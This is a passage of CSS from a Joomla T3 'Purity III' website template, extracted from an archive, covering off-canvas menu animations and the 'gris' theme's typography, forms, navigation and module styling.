.off-canvas-right.off-canvas-effect-11.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-12 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
}
.off-canvas-effect-12 .t3-wrapper {
  height: auto;
  overflow: hidden;
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(-10deg);
  transform: rotateY(-10deg);
}
.off-canvas-effect-12.t3-off-canvas {
  opacity: 1;
  -webkit-transform: translate3d(-100%, 0, 0);
  transform: translate3d(-100%, 0, 0);
}
.off-canvas-effect-12.off-canvas-open .off-canvas-effect-12.t3-off-canvas {
  -webkit-transition: -webkit-transform 0.5s;
  transition: transform 0.5s;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
}
.off-canvas-effect-12.t3-off-canvas::after {
  display: none;
}
.off-canvas-right.off-canvas-effect-12 .t3-wrapper {
  -webkit-transform-origin: 0 50%;
  transform-origin: 0 50%;
}
.off-canvas-right.off-canvas-effect-12.off-canvas-open .t3-wrapper {
  -webkit-transform: rotateY(10deg);
  transform: rotateY(10deg);
}
.off-canvas-right.off-canvas-effect-12.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0);
  transform: translate3d(100%, 0, 0);
}
body.off-canvas-effect-13 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-13.t3-off-canvas {
  z-index: 1;
  opacity: 1;
  -webkit-transform: translate3d(0, -100%, 0);
  transform: translate3d(0, -100%, 0);
}
.off-canvas-effect-13.off-canvas-open .off-canvas-effect-13.t3-off-canvas {
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(0, 0, 0);
  transform: translate3d(0, 0, 0);
  -webkit-transition-speed: 0.2s;
  transition-speed: 0.2s;
}
body.off-canvas-effect-13.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-13.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
body.off-canvas-effect-14 {
  -webkit-perspective: 1500px;
  perspective: 1500px;
  -webkit-perspective-origin: 0% 50%;
  perspective-origin: 0% 50%;
}
.off-canvas-effect-14 .t3-wrapper {
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(250px, 0, 0);
  transform: translate3d(250px, 0, 0);
}
.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(90deg);
  transform: translate3d(-100%, 0, 0) rotateY(90deg);
  -webkit-transform-origin: 0% 50%;
  transform-origin: 0% 50%;
  -webkit-transform-style: preserve-3d;
  transform-style: preserve-3d;
}
.off-canvas-effect-14.off-canvas-open .off-canvas-effect-14.t3-off-canvas {
  -webkit-transition-delay: 0.1s;
  transition-delay: 0.1s;
  -webkit-transition-timing-function: ease-in-out;
  transition-timing-function: ease-in-out;
  -webkit-transition-property: -webkit-transform;
  transition-property: transform;
  -webkit-transform: translate3d(-100%, 0, 0) rotateY(0deg);
  transform: translate3d(-100%, 0, 0) rotateY(0deg);
}
body.off-canvas-effect-14.off-canvas-right {
  -webkit-perspective-origin: 100% 50%;
  perspective-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .t3-wrapper {
  -webkit-transform: translate3d(-250px, 0, 0);
  transform: translate3d(-250px, 0, 0);
}
.off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(-90deg);
  transform: translate3d(100%, 0, 0) rotateY(-90deg);
  -webkit-transform-origin: 100% 50%;
  transform-origin: 100% 50%;
}
.off-canvas-right.off-canvas-effect-14.off-canvas-open .off-canvas-right.off-canvas-effect-14.t3-off-canvas {
  -webkit-transform: translate3d(100%, 0, 0) rotateY(0deg);
  transform: translate3d(100%, 0, 0) rotateY(0deg);
}
.old-ie .t3-off-canvas {
  z-index: 100 !important;
  left: -250px;
}
html[dir="ltr"] .off-canvas-right.old-ie .t3-off-canvas {
  right: -250px;
  left: auto;
}
.modal-open .t3-wrapper {
  position: static;
}
.off-canvas-toggle {
  border-radius: 0;
  border: 0;
  background: transparent;
  color: #c4c4c4;
  padding: 0;
  width: 55px;
  height: 55px;
  line-height: 55px;
  position: absolute;
  top: 0;
  left: 0;
}
.off-canvas-toggle:hover,
.off-canvas-toggle:active,
.off-canvas-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
  background: #383737;
  color: #ffffff;
}
@media screen and (max-width: 1024px) {
  .no-responsive #t3-mainnav .container {
    padding-left: 53px;
  }
}
.t3-off-canvas {
  background: #ffffff;
  color: #444444;
}
.t3-off-canvas .t3-off-canvas-header {
  background: #eeeeee;
  color: #444444;
  padding: 0 0 0 12px;
  height: 55px;
}
.t3-off-canvas .t3-off-canvas-header h2 {
  margin: 0;
  line-height: 55px;
  font-size: 14px;
  font-weight: bold;
  text-transform: uppercase;
}
.t3-off-canvas .close {
  margin: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  background: transparent;
  position: absolute;
  top: 0;
  right: 0;
}
.t3-off-canvas .t3-off-canvas-body {
  padding: 24px 12px;
}
.t3-off-canvas .t3-off-canvas-body a {
  color: #454444;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:hover,
.t3-off-canvas .t3-off-canvas-body a:focus {
  color: #1e1e1e;
  text-decoration: none;
}
.t3-off-canvas .t3-off-canvas-body a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.t3-off-canvas .t3-off-canvas-body .t3-module {
  margin-bottom: 20px;
}
.t3-off-canvas .t3-off-canvas-body .module-title {
  margin-bottom: 10px;
}PKԜ�\�֔���-purity_iii/local/css/themes/gris/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: left;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #454444;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #1e1e1e;
  text-decoration: underline;
}
a:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: left;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #454444;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: left;
}
.text-right {
  text-align: right;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-left: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-left: 0;
  list-style: none;
}
.list-inline {
  padding-left: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-left: 5px;
  padding-right: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-left: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: left;
    width: 160px;
    clear: left;
    text-align: right;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-left: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    content: " ";
    display: table;
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-left: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-right: 15px;
  padding-left: 0;
  border-right: 5px solid #eeeeee;
  border-left: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: right;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:hover,
.btn-inverse:focus,
.btn-inverse.focus,
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  background-image: none;
}
.btn-inverse.disabled,
.btn-inverse[disabled],
fieldset[disabled] .btn-inverse,
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
.btn-inverse[disabled]:focus,
fieldset[disabled] .btn-inverse:focus,
.btn-inverse.disabled.focus,
.btn-inverse[disabled].focus,
fieldset[disabled] .btn-inverse.focus,
.btn-inverse.disabled:active,
.btn-inverse[disabled]:active,
fieldset[disabled] .btn-inverse:active,
.btn-inverse.disabled.active,
.btn-inverse[disabled].active,
fieldset[disabled] .btn-inverse.active {
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse .badge {
  color: #444444;
  background-color: #ffffff;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
.btn-actions .btn-lg {
  font-size: 18px;
  padding: 10px 20px;
  border-radius: 20px;
}
.btn-actions .btn + .btn {
  margin-left: 20px;
}
@media screen and (min-width: 768px) {
  .btn-actions .btn-lg {
    font-size: 24px;
    padding: 10px 30px;
    border-radius: 30px;
  }
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-left: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-left-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-left-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #454444;
  border-bottom-color: #454444;
}
.nav a:hover .caret {
  border-top-color: #1e1e1e;
  border-bottom-color: #1e1e1e;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-left: 0;
  padding-right: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  content: " ";
  display: table;
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: left;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
}
@media screen and (min-width: 768px) {
  .counter {
    float: right;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  right: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -15px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #454444;
  border-color: #383737;
}
.navbar-default .navbar-text {
  color: #c4c4c4;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-left: 30px;
  }
}
.navbar-default .navbar-nav > li > a {
  color: #c4c4c4;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #383737;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #c4c4c4;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #383737;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #c4c4c4;
  border-bottom-color: #c4c4c4;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #383737;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #2b2b2b;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #c4c4c4;
    padding: 20px 20px 20px 30px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #2b2b2b;
    border-top: 1px solid #1e1e1e;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #1e1e1e;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-left: 40px;
  }
}
.navbar-default .navbar-link {
  color: #c4c4c4;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #383737;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-left: 0;
  padding-right: 0;
  float: left;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -15px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-right: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #383737;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  left: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  right: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  content: " ";
  display: table;
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-left: 20px;
  padding-left: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-left: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-left: 0;
  margin-left: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #383737;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    left: auto;
    right: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: right;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
